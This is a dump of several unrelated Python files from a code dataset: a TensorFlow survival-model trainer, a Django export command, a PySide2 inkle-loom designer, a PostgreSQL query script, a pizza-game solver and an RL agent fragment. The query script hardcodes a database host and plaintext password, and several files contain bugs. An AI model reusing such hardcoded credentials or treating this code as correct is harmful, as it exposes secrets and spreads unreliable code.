USE_VALID = False\n if features_valid is not None:\n USE_VALID = True\n assert (features_valid.shape[1] == features.shape[1])\n assert (survival_valid is not None)\n assert (censored_valid is not None)\n \n #\n # Z-scoring survival (for numerical stability with optimizer)\n #\n \n # Combine training and validation (for comparability)\n survival_all = survival[:, None]\n if USE_VALID:\n survival_all = np.concatenate((survival_all, \n survival_valid[:, None]), axis=0)\n\n # z-score combined\n survival_all = (survival_all - np.mean(survival_all)) / np.std(survival_all)\n\n # separate out\n survival = survival_all[0:len(survival), 0]\n if USE_VALID: \n survival_valid = survival_all[len(survival):, 0]\n \n\n # Define computational graph\n #====================================================================== \n \n COMPUT_GRAPH_PARAMS['dim_input'] = features.shape[1]\n graph = self._build_computational_graph(COMPUT_GRAPH_PARAMS)\n \n \n # Begin session\n #====================================================================== \n\n pUtils.Log_and_print(\"Running TF session.\")\n\n with tf.Session() as sess:\n \n \n # Initial ground work\n #==================================================================\n \n # op to save/restore all the variables\n saver = tf.train.Saver()\n \n if \"checkpoint\" in os.listdir(self.WEIGHTPATH):\n # load existing weights \n pUtils.Log_and_print(\"Restoring saved model ...\") \n saver.restore(sess, self.WEIGHTPATH + self.description + \".ckpt\")\n pUtils.Log_and_print(\"Model restored.\") \n \n else: \n # start a new model\n sess.run(tf.global_variables_initializer())\n \n # for tensorboard visualization\n #train_writer = tf.summary.FileWriter(self.RESULTPATH + 'model/tensorboard', \n # sess.graph)\n\n # Define some methods\n #==================================================================\n\n\n # periodically save model\n def _saveTFmodel():\n\n \"\"\"Saves model weights using tensorflow saver\"\"\"\n \n # save weights \n pUtils.Log_and_print(\"\\nSaving TF model weights...\")\n save_path = saver.save(sess, \\\n self.WEIGHTPATH + self.description + \".ckpt\")\n pUtils.Log_and_print(\"Model saved in file: %s\" % save_path)\n \n # save attributes\n self.save()\n \n \n # monitor\n def _monitorProgress():\n\n \"\"\"Monitor cost\"\"\"\n \n cs = np.array(self.Costs_epochLevel_train)\n epoch_no = np.arange(len(cs))\n cs = np.concatenate((epoch_no[:, None], cs), axis=1)\n \n cs_valid = None\n if USE_VALID:\n cs_valid = np.array(self.Costs_epochLevel_valid)\n \n self._plotMonitor(arr= cs, arr2= cs_valid,\n title= \"cost vs. epoch\", \n xlab= \"epoch\", ylab= \"cost\", \n savename= self.RESULTPATH + \"plots/\" +\n self.description + \"cost.svg\")\n\n \n # Begin epochs\n #==================================================================\n \n try: \n itir = 0\n while itir < MAX_ITIR:\n \n #pUtils.Log_and_print(\"\\n\\tTraining epoch {}\\n\".format(self.EPOCHS_RUN))\n \n itir += 1\n cost_tot = 0\n cost_tot_valid = 0\n \n # Shuffle so that training batches differ every epoch\n #==========================================================\n \n idxs = np.arange(features.shape[0]);\n np.random.shuffle(idxs)\n features = features[idxs, :]\n survival = survival[idxs]\n censored = censored[idxs]\n \n # Divide into balanced batches\n #==========================================================\n \n # Get balanced batches (if relevant)\n if BATCH_SIZE < censored.shape[0]:\n batchIdxs = dm.get_balanced_batches(censored, BATCH_SIZE = BATCH_SIZE)\n else:\n batchIdxs = [np.arange(censored.shape[0])]\n \n if USE_VALID:\n batchIdxs_valid = \\\n dm.get_balanced_batches(censored_valid, BATCH_SIZE = BATCH_SIZE) \n \n # Run over training set\n #==========================================================\n \n for batchidx, batch in enumerate(batchIdxs):\n \n # Getting at-risk groups\n t_batch, o_batch, at_risk_batch, x_batch = \\\n sUtils.calc_at_risk(survival[batch], \n 1-censored[batch],\n features[batch, :])\n \n # run optimizer and fetch cost\n \n feed_dict = {graph.X_input: x_batch,\n graph.T: t_batch,\n graph.O: o_batch,\n graph.At_Risk: at_risk_batch,\n } \n \n _, cost = sess.run([graph.optimizer, graph.cost], \\\n feed_dict = feed_dict)\n \n # normalize cost for sample size\n cost = cost / len(batch)\n \n # record/append cost\n #self.Costs_batchLevel_train.append(cost) \n cost_tot += cost \n \n #pUtils.Log_and_print(\"\\t\\tTraining: Batch {} of {}, cost = {}\".\\\n # format(batchidx, len(batchIdxs)-1, round(cost[0], 3)))\n \n\n # Run over validation set\n #==========================================================\n if USE_VALID: \n for batchidx, batch in enumerate(batchIdxs_valid):\n \n # Getting at-risk groups\n t_batch, o_batch, at_risk_batch, x_batch = \\\n sUtils.calc_at_risk(survival[batch], \n 1-censored[batch],\n features[batch, :])\n \n # fetch cost\n \n feed_dict = {graph.X_input: x_batch,\n graph.T: t_batch,\n graph.O: o_batch,\n graph.At_Risk: at_risk_batch,\n } \n \n cost = sess.run(graph.cost, feed_dict = feed_dict)\n \n # normalize cost for sample size\n cost = cost / len(batch)\n \n # record/append cost\n #self.Costs_batchLevel_valid.append(cost)\n cost_tot_valid += cost\n \n pUtils.Log_and_print(\"\\t\\tValidation: Batch {} of {}, cost = {}\".\\\n format(batchidx, len(batchIdxs_valid)-1, round(cost[0], 3)))\n\n # Update and save \n #==========================================================\n \n # update epochs and append costs \n self.EPOCHS_RUN += 1\n self.Costs_epochLevel_train.append(cost_tot)\n if USE_VALID:\n self.Costs_epochLevel_valid.append(cost_tot_valid) \n \n\n # periodically save model\n #if (self.EPOCHS_RUN % MODEL_SAVE_STEP) == 0:\n # _saveTFmodel() \n \n # periodically monitor progress\n if (self.EPOCHS_RUN % PLOT_STEP == 0) and \\\n (self.EPOCHS_RUN > 0):\n _monitorProgress() \n \n except KeyboardInterrupt:\n pass\n \n # save final model and plot costs\n #_saveTFmodel()\n _monitorProgress()\n\n pUtils.Log_and_print(\"\\nFinished training model.\")\n pUtils.Log_and_print(\"Obtaining final results.\")\n \n # save learned weights\n #w = sess.run(graph.w, feed_dict = feed_dict)\n #np.save(self.RESULTPATH + 'model/' + self.description + \\\n # 'featWeights.npy', w)\n W = sess.run(graph.W, feed_dict = feed_dict)\n \n return W\n\n \n #%%============================================================================\n # Rank features\n #==============================================================================\n\n \n# def rankFeats(self, X, fnames, rank_type = \"weights\"):\n# \n# \"\"\" ranks features by feature weights or variance after transform\"\"\"\n# \n# print(\"Ranking features by \" + rank_type)\n# \n# fidx = np.arange(self.D).reshape(self.D, 1) \n# \n# w = np.load(self.RESULTPATH + 'model/' + self.description + 'featWeights.npy') \n# \n# if rank_type == 'weights':\n# # rank by feature weight\n# ranking_metric = w[:, None]\n# elif rank_type == 'stdev':\n# # rank by variance after transform\n# W = np.zeros([self.D, self.D])\n# np.fill_diagonal(W, w)\n# X = np.dot(X, W)\n# ranking_metric = np.std(X, 0).reshape(self.D, 1)\n# \n# ranking_metric = np.concatenate((fidx, ranking_metric), 1) \n# \n# # Plot feature weights/variance\n# if self.D <= 500:\n# n_plot = ranking_metric.shape[0]\n# else:\n# n_plot = 500\n# self._plotMonitor(ranking_metric[0:n_plot,:], \n# \"feature \" + rank_type, \n# \"feature_index\", rank_type, \n# self.RESULTPATH + \"plots/\" + self.description + \n# \"feat_\" + rank_type+\"_.svg\")\n# \n# # rank features\n# \n# if rank_type == \"weights\":\n# # sort by absolute weight but keep sign\n# ranking = ranking_metric[np.abs(ranking_metric[:,1]).argsort()][::-1]\n# elif rank_type == 'stdev': \n# ranking = ranking_metric[ranking_metric[:,1].argsort()][::-1]\n# \n# fnames_ranked = fnames[np.int32(ranking[:,0])].reshape(self.D, 1)\n# fw = ranking[:,1].reshape(self.D, 1) \n# fnames_ranked = np.concatenate((fnames_ranked, fw), 1)\n# \n# # save results\n# \n# savename = self.RESULTPATH + \"ranks/\" + self.description +\\\n# rank_type + \"_ranked.txt\"\n# with open(savename,'wb') as f:\n# np.savetxt(f,fnames_ranked,fmt='%s', delimiter='\\t')\n\n \n #%%============================================================================\n # Visualization methods\n #==============================================================================\n \n def _plotMonitor(self, arr, title, xlab, ylab, savename, arr2 = None):\n \n \"\"\" plots cost/other metric to monitor progress \"\"\"\n \n #print(\"Plotting \" + title)\n #\n #fig, ax = plt.subplots() \n #ax.plot(arr[:,0], arr[:,1], 'b', linewidth=1.5, aa=False)\n #if arr2 is not None:\n # ax.plot(arr[:,0], arr2, 'r', linewidth=1.5, aa=False)\n #plt.title(title, fontsize =16, fontweight ='bold')\n #plt.xlabel(xlab)\n #plt.ylabel(ylab) \n #plt.tight_layout()\n #plt.savefig(savename)\n #plt.close()\n \n #\n # Saving instead of plotting to avoid\n # Xdisplay issues when using screen\n #\n print(\"Saving \" + title)\n with open(savename.split('.')[0] + '.txt', 'wb') as f:\n np.savetxt(f, arr, fmt='%s', delimiter='\\t')\n\n #========================================================================== \n \n#%% ###########################################################################\n#%% ###########################################################################\n#%% ###########################################################################\n#%% ###########################################################################\n","sub_path":"junk/0_NCA_model_experimental_old.py","file_name":"0_NCA_model_experimental_old.py","file_ext":"py","file_size_in_byte":23471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"297146859","text":"import os\nimport csv\nfrom django.conf import settings\nfrom django.core.management.base import BaseCommand, CommandError\nfrom arches.app.models.resource import Resource\nfrom arches.app.models.graph import Graph\n\nclass Command(BaseCommand):\n\n help = 'export all of the FMSF site ids from resources in the database'\n\n def add_arguments(self, parser):\n pass\n\n def handle(self, *args, **options):\n \n site_models = [\n \"Archaeological Site\",\n \"Historic Cemetery\",\n \"Historic Structure\"\n ]\n \n for g in Graph.objects.all():\n if not g.name in site_models:\n continue\n\n sites = [i for i in Resource.objects.all() if i.graph_id == g.pk]\n\n print(\"{} Count: {}\".format(g.name, len(sites)))\n \n fname = \"ids-{}.csv\".format(g.name.replace(\" \",\"\"))\n with open(os.path.join(settings.LOG_DIR, fname), \"wb\") as out:\n writer = csv.writer(out)\n writer.writerow([\"ResourceID\",\"FMSF ID\"])\n for s in sites:\n writer.writerow([s.resourceinstanceid, s.get_node_values(\"FMSF ID\")[0]])\n ","sub_path":"fpan/management/commands/export_fmsf_siteids.py","file_name":"export_fmsf_siteids.py","file_ext":"py","file_size_in_byte":1183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"200541891","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n__author__ = 'brian'\n\nfrom PySide2.QtWidgets import QApplication, QWidget, QPushButton, QFrame, QGridLayout, QColorDialog, QLabel, \\\n QVBoxLayout, QHBoxLayout, QSpacerItem, QCheckBox, QMainWindow, QAction, QFileDialog, QMessageBox\n\nfrom PySide2.QtGui import QFont, QIcon\nfrom PySide2.QtCore import *\nfrom guppy import hpy\nfrom foreground import get_foreground\nfrom functools import partial\nimport os.path\nimport inspect\nimport pickle\nimport sys\n\n\ndef dump_args(func):\n \"\"\"Decorator to print function call details - parameters names and effective values.\n \"\"\"\n\n def wrapper(*args, **kwargs):\n func_args = inspect.signature(func).bind(*args, **kwargs).arguments\n func_args_str = ', '.join('{} = {!r}'.format(*item) for item in func_args.items())\n print(f'{func.__module__}.{func.__qualname__} ( {func_args_str} )')\n return func(*args, **kwargs)\n\n return wrapper\n\n\nclass ColourButton(QPushButton):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.setStyleSheet(\"\"\" MyButton { \n border - style: outset;\n border - width: 50 px;\n border - radius: 2000px;\n border - color: white;\n padding: 4 px;\n font: bold;\n font-size: 36px;\n }\"\"\")\n\n self.colour = self.palette().button().color().name()\n self.inital_colour = self.colour\n\n def setColour(self, col, *textcol):\n try:\n tcol = textcol[0] if textcol else 'black'\n s = \"QPushButton {background-color: \" + col + \"; color: \" + tcol + \";}\"\n self.setStyleSheet(s)\n self.colour = col\n except TypeError:\n pass\n\n def getColour(self):\n return self.colour\n\n\nclass YarnPalette():\n def __init__(self, yarn_ct):\n self.yarns = []\n self.yarn_lock = False\n self.create_yarns(yarn_ct)\n self.current_yarn_index = 0\n\n\n def create_yarns(self, yarn_ct):\n for yarn_no in range(yarn_ct):\n yarn = self.Yarn()\n yarn.index = yarn_no\n self.yarns.append(yarn)\n\n def change_yarn_colour(self, x, yarn_lock):\n yarn = self.yarns[x]\n if not yarn_lock:\n dialog_col = QColorDialog.getColor()\n if dialog_col.isValid():\n new_col = dialog_col.name()\n yarn.setColour(new_col)\n self.yarns[self.current_yarn_index].clear_current_marker()\n yarn.set_current_marker()\n self.current_yarn_index = x\n\n # text_colour = get_foreground(yarn.getColour())\n # yarn.setColour(yarn.getColour(), text_colour)\n # yarn.setFont(self.checkFont)\n # self.yarns[self.current_yarn_index].setText('')\n # yarn.setText(u'\\u2713')\n\n class Yarn(ColourButton):\n def __init__(self):\n ColourButton.__init__(self)\n self.index = None\n self.inuse = False\n self.checkFont = QFont()\n self.checkFont.setBold(True)\n self.checkFont.setPointSize(18)\n\n def reinitialise(self):\n self.setColour(self.inital_colour)\n self.inuse = False\n self.setText('')\n\n def set_colour_marker(self):\n text_colour = get_foreground(self.getColour())\n self.setColour(self.getColour(), text_colour)\n self.setFont(self.checkFont)\n self.setText(u'\\u2713')\n\n def clear_colour_marker(self):\n self.setText('')\n\n def reload(self, load_data, current_yarn):\n self.setColour(load_data[\"colour\"])\n self.inuse = load_data[\"inuse\"]\n txt = u'\\u2713' if self.index == current_yarn else ''\n self.setFont(self.checkFont)\n self.setText(txt)\n\n\nclass Loom():\n def __init__(self, max_warp_threads, pick_ct):\n self.warp_threads = []\n self.warp_thread_ct = 0\n self.max_warp_threads = max_warp_threads\n self.pick_ct = pick_ct\n\n def add_warp_thread(self):\n if self.warp_thread_ct < self.max_warp_threads:\n warp_thread = self.WarpThread(self.pick_ct)\n warp_thread.index = self.warp_thread_ct\n warp_thread.isHeddled = True if warp_thread.index % 2 == 0 else False\n self.warp_threads.append(warp_thread)\n self.set_alt_warp_threads()\n self.warp_thread_ct += 1\n return True\n else:\n return False\n\n def remove_warp_thread(self):\n if self.warp_thread_ct > 0:\n self.warp_thread_ct -= 1\n warp_thread = self.warp_threads[self.warp_thread_ct]\n for pick in warp_thread.picks:\n pick.setParent(None)\n # pick.deleteLater()\n del pick\n warp_thread.setParent(None)\n if not warp_thread.isHeddled:\n alt_heddled_thread = self.warp_threads[self.warp_thread_ct - 1]\n alt_heddled_thread.pickup_yarn_index = None\n for pick in alt_heddled_thread.picks:\n pick.set_display_colour(alt_heddled_thread, None)\n # warp.deleteLater()\n del warp_thread\n return True\n else:\n return False\n\n def set_alt_warp_threads(self):\n for warp_thread in self.warp_threads:\n alt_warp_thread_index = warp_thread.index + 1 if warp_thread.isHeddled else warp_thread.index - 1\n try:\n warp_thread.pickup_yarn_index = self.warp_threads[alt_warp_thread_index]\n except IndexError:\n warp_thread.pickup_yarn_index = None\n\n def reload(self, load_data, yarns):\n self.set_alt_warp_threads()\n for data in load_data:\n self.warp_threads[data[\"index\"]].reload(data, yarns)\n for warp_thread in self.warp_threads:\n warp_thread.reload_pick_colours()\n\n def change_warp_colour(self, yarn):\n for warp_thread in self.warp_threads:\n if warp_thread.yarn_index == yarn.index:\n warp_thread.new_colour(yarn)\n\n class WarpThread(ColourButton):\n def __init__(self, pick_ct):\n ColourButton.__init__(self)\n self.index = None\n self.yarn_index = None\n self.alt_warp_thread = None\n self.isHeddled = True\n self.pick_ct = pick_ct\n self.picks = []\n for pick_no in range(self.pick_ct):\n pick = self.Pick()\n pick.index = pick_no\n self.picks.append(pick)\n\n def new_colour(self, yarn):\n self.yarn_index = yarn.index\n self.setColour(yarn.getColour())\n for pick in self.picks:\n pick.set_display_colour(self, self.alt_warp_thread)\n\n def toggle_pick(self, pick_index):\n self.picks[pick_index].toggle_pick(self, self.alt_warp_thread)\n\n def reintialise(self):\n self.setColour(self.inital_colour)\n self.yarn_index = None\n for pick in self.picks:\n pick.reinitialise()\n\n def reload(self, data, yarns):\n self.pick_ct = len(data[\"picks\"])\n for pick in self.picks:\n pick.reload(data[\"picks\"][pick.index])\n try:\n self.new_colour(yarns[data[\"yarn_index\"]])\n except TypeError:\n self.setColour(self.inital_colour)\n\n def reload_pick_colours(self):\n for pick in self.picks:\n pick.set_display_colour(self, self.alt_warp_thread)\n\n class Pick(ColourButton):\n def __init__(self):\n ColourButton.__init__(self)\n self.index = None\n self.isPicked = False\n\n def set_display_colour(self, warp_thread, alt_warp_thread):\n if not self.isPicked:\n self.setColour(warp_thread.getColour())\n else:\n try:\n self.setColour(alt_warp_thread.getColour())\n except AttributeError:\n self.setColour(warp_thread.getColour())\n\n def toggle_pick(self, warp_thread, alt_warp_thread):\n self.isPicked = not self.isPicked\n self.set_display_colour(warp_thread, alt_warp_thread)\n\n def reinitialise(self):\n self.setColour(self.inital_colour)\n self.isPicked = False\n\n def reload(self, load_data):\n self.isPicked = load_data[\"isPicked\"]\n\n\nclass Window(QMainWindow):\n def __init__(self):\n super(Window, self).__init__()\n self.setWindowTitle(os.path.splitext(os.path.basename(__file__))[0])\n self.add_menu()\n self.setFixedSize(1200, 700)\n self.titleFont = QFont()\n self.titleFont.setBold(True)\n self.titleFont.setPointSize(16)\n self.yarns = YarnPalette(12)\n for yarn in self.yarns.yarns:\n yarn.clicked.connect(\n lambda checked=yarn.isChecked(), x=yarn.index: self.change_yarn_colour(x, self.yarns.yarn_lock))\n self.current_yarn_index = None\n self.yarn_lock = QCheckBox(\"Lock Colours\")\n self.yarn_lock.stateChanged.connect(self.yarn_lock_changed)\n self.yarn_frame = QFrame(self)\n self.design_yarn_frame()\n self.loom_frame = QFrame(self)\n self.loom_add_warp_thread_btn = QPushButton(self.loom_frame)\n self.loom_remove_warp_thread_btn = QPushButton(self.loom_frame)\n self.design_loom_frame()\n self.band_frame = QFrame(self)\n self.band_title = QLabel(self.band_frame)\n self.design_band_frame()\n self.loom = Loom(80, 20)\n self.warp_thread_ct = 0\n self.initial_warp_ct = 12\n self.create_initial_warp(self.initial_warp_ct)\n\n def create_initial_warp(self, number_of_warps):\n for warp_no in range(number_of_warps):\n self.add_warp_thread(warp_no)\n\n def design_yarn_frame(self):\n self.yarn_frame.setFrameShape(QFrame.StyledPanel)\n self.yarn_frame.setGeometry(0, 20, 200, 180)\n yarn_box = QVBoxLayout()\n title = QLabel(\"Yarns\")\n title.setFont(self.titleFont)\n title.setAlignment(Qt.AlignCenter)\n yarn_box.addWidget(title)\n yarn_grid = QGridLayout()\n yarn_grid.setColumnStretch(1, 4)\n yarn_grid.setColumnStretch(2, 4)\n yarn_grid.setColumnStretch(3, 4)\n for yarn in self.yarns.yarns:\n yarn.setFixedSize(35, 30)\n yarn_grid.addWidget(yarn)\n yarn_box.addLayout(yarn_grid)\n yarn_lock_box = QHBoxLayout()\n yarn_lock_box.addWidget(self.yarn_lock)\n yarn_box.addLayout(yarn_lock_box)\n self.yarn_frame.setLayout(yarn_box)\n\n def design_loom_frame(self):\n self.loom_frame.setFrameShape(QFrame.StyledPanel)\n self.loom_frame.setGeometry(200, 20, 1000, 180)\n title = QLabel(self.loom_frame)\n title.setText(\"Loom\")\n title.setGeometry(400, 14, 200, 20)\n title.setFont(self.titleFont)\n self.loom_add_warp_thread_btn.setText(\"Thread +\")\n self.loom_add_warp_thread_btn.move(10, 40)\n self.loom_add_warp_thread_btn.clicked.connect(lambda: self.add_warp_thread(self.warp_thread_ct))\n self.loom_remove_warp_thread_btn.setText(\"Thread -\")\n self.loom_remove_warp_thread_btn.move(910, 40)\n self.loom_remove_warp_thread_btn.clicked.connect(lambda: self.remove_warp_thread())\n\n def design_band_frame(self):\n self.band_frame.setFrameShape(QFrame.StyledPanel)\n self.band_frame.setGeometry(0, 200, 1200, 500)\n self.band_title.setText(\"Band\")\n self.band_title.setGeometry(600, 14, 200, 20)\n self.band_title.setFont(self.titleFont)\n\n def yarn_lock_changed(self, state):\n self.yarns.yarn_lock = True if state == Qt.Checked else False\n\n def change_yarn_colour(self, x, yarn_lock):\n self.yarns.change_yarn_colour(x, yarn_lock)\n self.loom.change_warp_colour(self.yarns.yarns[x])\n\n def display_warp_thread(self, warp_thread):\n warp_thread.resize(10, 30)\n x_offset = 100\n y_offset = 80\n warp_thread.setParent(self.loom_frame)\n y = y_offset if warp_thread.isHeddled else y_offset + 30\n warp_thread.move(x_offset + warp_thread.index * 10, y)\n warp_thread.show()\n for pick in warp_thread.picks:\n pick.resize(28, 11)\n x_offset = 20\n y_offset = 50\n pick.setParent(self.band_frame)\n x = x_offset if warp_thread.isHeddled else x_offset + 29\n y = y_offset if warp_thread.isHeddled else y_offset + 5\n pick.move(x + 58 * pick.index, y + 11 * (warp_thread.index // 2))\n pick.show()\n\n def add_warp_thread(self, warp_no):\n if self.loom.add_warp_thread():\n self.loom.warp_threads[warp_no].clicked.connect(\n lambda checked=self.loom.warp_threads[warp_no].isChecked(), x=warp_no: self.set_warp_colour(x))\n for pick in self.loom.warp_threads[warp_no].picks:\n pick.clicked.connect(\n lambda checked=pick.isChecked(), x=warp_no, y=pick.index: self.pickup_single_thread(x, y))\n self.display_warp_thread(self.loom.warp_threads[warp_no])\n self.warp_thread_ct += 1\n\n def remove_warp_thread(self):\n if self.loom.remove_warp_thread():\n self.warp_thread_ct -= 1\n\n # def change_yarn_colour(self, yarn_no):\n # clicked_yarn = self.yarns[yarn_no]\n # if clicked_yarn.change_colour(self.yarn_lock.isChecked()):\n # try:\n # prev_yarn = self.yarns[self.current_yarn_index]\n # prev_yarn.clear_colour_marker()\n # except TypeError:\n # pass\n # clicked_yarn.set_colour_marker()\n # self.current_yarn_index = yarn_no\n # self.change_warp_colour(clicked_yarn)\n\n def set_warp_colour(self, clicked_warp_no):\n yarn = self.yarns.yarns[self.yarns.current_yarn_index]\n self.loom.warp_threads[clicked_warp_no].new_colour(yarn)\n\n def change_warp_colour(self, yarn):\n self.loom.change_warp_colour(yarn)\n\n def pickup_single_thread(self, warp_no, clicked_pick_no):\n self.loom.warp_threads[warp_no].toggle_pick(clicked_pick_no)\n\n def add_menu(self):\n newAction = QAction('&New', self)\n newAction.setShortcut('Ctrl+N')\n newAction.setStatusTip('New document')\n newAction.triggered.connect(self.newCall)\n\n openAction = QAction('&Open', self)\n openAction.setShortcut('Ctrl+O')\n openAction.setStatusTip('Open document')\n openAction.triggered.connect(self.openCall)\n\n saveAction = QAction('&Save', self)\n saveAction.setShortcut('Ctrl+O')\n saveAction.setStatusTip('Save design')\n saveAction.triggered.connect(self.saveCall)\n\n exitAction = QAction('&Exit', self)\n exitAction.setShortcut('Ctrl+Q')\n exitAction.setStatusTip('Exit application')\n exitAction.triggered.connect(self.exitCall)\n\n menuBar = self.menuBar()\n fileMenu = menuBar.addMenu('&File')\n fileMenu.addAction(newAction)\n fileMenu.addAction(openAction)\n fileMenu.addAction(saveAction)\n fileMenu.addAction(exitAction)\n printMenu = menuBar.addMenu('&Print')\n\n def openCall(self):\n picklefile, _ = QFileDialog().getOpenFileName(self, \"Load Inkle Pattern\", \"./Patterns\",\n \"Inkle Pattern Files (*.ik2)\",\n options=QFileDialog.DontUseNativeDialog)\n load_dump = pickle.load(open(picklefile, \"rb\"))\n load_main = load_dump[\"save_main\"]\n load_yarns = load_dump[\"save_yarns\"]\n load_loom = load_dump[\"save_loom\"]\n self.band_title = load_main[\"title\"]\n self.current_yarn_index = load_main[\"current_yarn\"]\n self.yarn_lock.setChecked(load_main[\"yarn_lock\"])\n load_thread_ct = load_main[\"thread_ct\"]\n for yarn in self.yarns:\n yarn.reload(load_yarns[yarn.index], self.current_yarn_index)\n while self.warp_thread_ct > load_thread_ct:\n self.remove_warp_thread()\n for warp_no in range(self.warp_thread_ct, load_thread_ct):\n self.add_warp_thread(warp_no)\n self.loom.reload(load_loom, self.yarns)\n self.warp_thread_ct = load_thread_ct\n\n def newCall(self):\n self.band_title.setText(\"Band\")\n self.current_yarn_index = None\n self.yarn_lock.setChecked(False)\n for yarn in self.yarns:\n yarn.reinitialise()\n while self.warp_thread_ct > 12:\n self.remove_warp_thread()\n for warp_thread in self.loom.warp_threads:\n warp_thread.reintialise()\n for warp_no in range(self.warp_thread_ct, 12):\n self.add_warp_thread(warp_no)\n\n def saveCall(self):\n save_main = {\"thread_ct\": self.warp_thread_ct, \"current_yarn\": self.current_yarn_index,\n \"yarn_lock\": self.yarn_lock.isChecked(), \"title\": self.band_title.text()}\n save_yarns = []\n for yarn in self.yarns:\n yarn_info = {\"index\": yarn.index, \"colour\": yarn.getColour(), \"inuse\": yarn.inuse}\n save_yarns.append(yarn_info)\n save_loom = []\n for warp_thread in self.loom.warp_threads:\n save_warp = {\"index\": warp_thread.index, \"yarn_index\": warp_thread.yarn_index}\n save_picks = []\n for pick in warp_thread.picks:\n save_pick = {\"index\": pick.index, \"isPicked\": pick.isPicked}\n save_picks.append(save_pick)\n save_warp['picks'] = save_picks\n save_loom.append(save_warp)\n save_dump = {\"save_main\": save_main, \"save_yarns\": save_yarns, \"save_loom\": save_loom}\n picklefile, _ = QFileDialog().getSaveFileName(self, \"Save Inkle Pattern\", \"./Patterns\",\n \"Inkle Pattern Files (*.ik2)\",\n options=QFileDialog.DontUseNativeDialog)\n pickle.dump(save_dump, open(picklefile + '.ik2', \"wb\"))\n\n def exitCall(self):\n print('Exit app')\n\n def closeEvent(self, event):\n if self.is_saved:\n event.accept()\n else:\n popup = QMessageBox(self)\n popup.setIcon(QMessageBox.Warning)\n popup.setText('The settings have been changed')\n popup.setInformativeText('Do you want to save the changes or discard them?')\n popup.setStandardButtons(QMessageBox.Save |\n QMessageBox.Discard |\n QMessageBox.Cancel)\n\n popup.setDefaultButton(QMessageBox.Save)\n answer = popup.exec_()\n if answer == QMessageBox.Save:\n self.save_settings()\n event.accept()\n elif answer == QMessageBox.Discard:\n self.load_settings()\n self.is_saved = True\n event.accept()\n elif answer == QMessageBox.Cancel:\n event.ignore()\n\n self.ui.statusLabel.clear()\n\n\nif __name__ == '__main__':\n h = hpy()\n\n myApp = QApplication(sys.argv)\n window = Window()\n window.show()\n\n myApp.exec_()\n # print(h.heap())\n # print(h.heapu())\n sys.exit(0)\n","sub_path":"QTInkle12.py","file_name":"QTInkle12.py","file_ext":"py","file_size_in_byte":19691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"137284903","text":"import psycopg2\r\nimport pandas as pd\r\nimport sys\r\n\r\nconnection_info = {\r\n \"host\" : \"206.189.80.195\",\r\n \"database\" : \"bootcamp\",\r\n \"user\" : \"bootcamp\",\r\n \"password\" : \"Bootcamp*123\"\r\n}\r\nconn = None\r\n\r\ntry:\r\n print('Connecting to the PostgreSQL database...')\r\n conn = psycopg2.connect(**connection_info)\r\n\r\n cursor = conn.cursor()\r\n cursor.execute('SELECT \"Region\",COUNT(*) AS \"TotalCountry\" FROM bootcamp_test_ajat group by \"Region\",\"Country\" LIMIT 10')\r\n data = cursor.fetchall()\r\n cursor.close()\r\n\r\n column_names = ['Region', 'TotalCountry']\r\n\r\n df = pd.DataFrame(data, columns=column_names)\r\n print(df)\r\n\r\nexcept (Exception, psycopg2.DatabaseError) as error:\r\n print(error)\r\n sys.exit(1) \r\nprint(\"Connection successful\")","sub_path":"jawaban_2/jawaban_8/nomer5.py","file_name":"nomer5.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"391551092","text":"# -*- coding: UTF-8 -*-\n# 就是一排pizza,你可以拿两头的其中一块,\n# 你的朋友会拿新的两头的两块中大的一块,\n# 如此继续,问你最多能拿到的面积是多少?\n# follow up : how to print path???\nimport collections\ndef getMaxPizza(nums, myAction):\n # use memorization\n path = []\n nums = tuple(nums)\n getMap = collections.defaultdict(int)\n return DFS(nums, getMap, myAction, path)\n\ndef DFS(nums, getMap, myAction, path):\n if not nums:\n return 0\n else:\n if (nums, myAction) not in getMap:\n if myAction: # 区分行动顺序\n front = DFS(nums[1:], getMap, 0, path + [nums[0]])\n back = DFS(nums[:-1], getMap, 0, path + [nums[-1]])\n if front + nums[0] >= back + nums[-1]:\n getMap[(nums, myAction)] = front + nums[0]\n path.append(nums[0])\n else:\n getMap[(nums, myAction)] = back + nums[-1]\n path.append(nums[-1])\n else:\n front = DFS(nums[1:], getMap, 1, path)\n back = DFS(nums[:-1], getMap, 1, path)\n getMap[(nums, myAction)] = min(front, back) # 对手的策略min player1的收益\n return getMap[(nums, myAction)]\n\nif __name__ == '__main__':\n nums = [5,3,4,2,1,12,31,1,12,1]\n nums = [0]\n nums = [3,1,3,2,4,3]\n assert getMaxPizza(nums, 0)+getMaxPizza(nums, 1) == sum(nums)","sub_path":"_pocket_gem_/take_pizza/memorization.py","file_name":"memorization.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"137759099","text":"import lightbox\nimport numpy as np\nfrom anytree import Node, RenderTree, LevelOrderIter\nfrom anytree.node.nodemixin import NodeMixin\nfrom scipy.stats import chi2_contingency, entropy\nimport math\nimport time\nimport os.path\nfrom os import path\n\n\n#==========================================================================================================\n#============================================ ABSTRACT AGENT ==============================================\n#==========================================================================================================\n\n#Parent of all agents\n\nclass AbstractAgent :\n \n #Constructor\n def __init__(self, env, M=50, N=20, K=20, epsilon=0.1, experiment_id = None, data_path=None, agent_type=\"Abstract\"):\n #lighbox env\n self.env = env\n \n #agent type\n self.type = agent_type\n \n #FMDP : dict of DBNs which are dict of CPTs initialized to 1 split tree on var and dict of parents\n self.FMDP = dict()\n for act in range(1, env.get_nb_light()+1):\n self.FMDP[act] = {\"cpts\" : dict(), \"parents\" : dict(), \"action\" : act}\n for var in range(1, env.get_nb_light()+1):\n self.FMDP[act][\"cpts\"][var] = self.CPTNode(self.FMDP[act], var,self)\n self.FMDP[act][\"parents\"][var] = []\n child_0 = self.CPTNode(self.FMDP[act], var,self, parents_list = [var], child_01= 0)\n child_1 = self.CPTNode(self.FMDP[act], var,self, parents_list = [var], child_01= 1)\n child_0.parent = self.FMDP[act][\"cpts\"][var]\n child_1.parent = 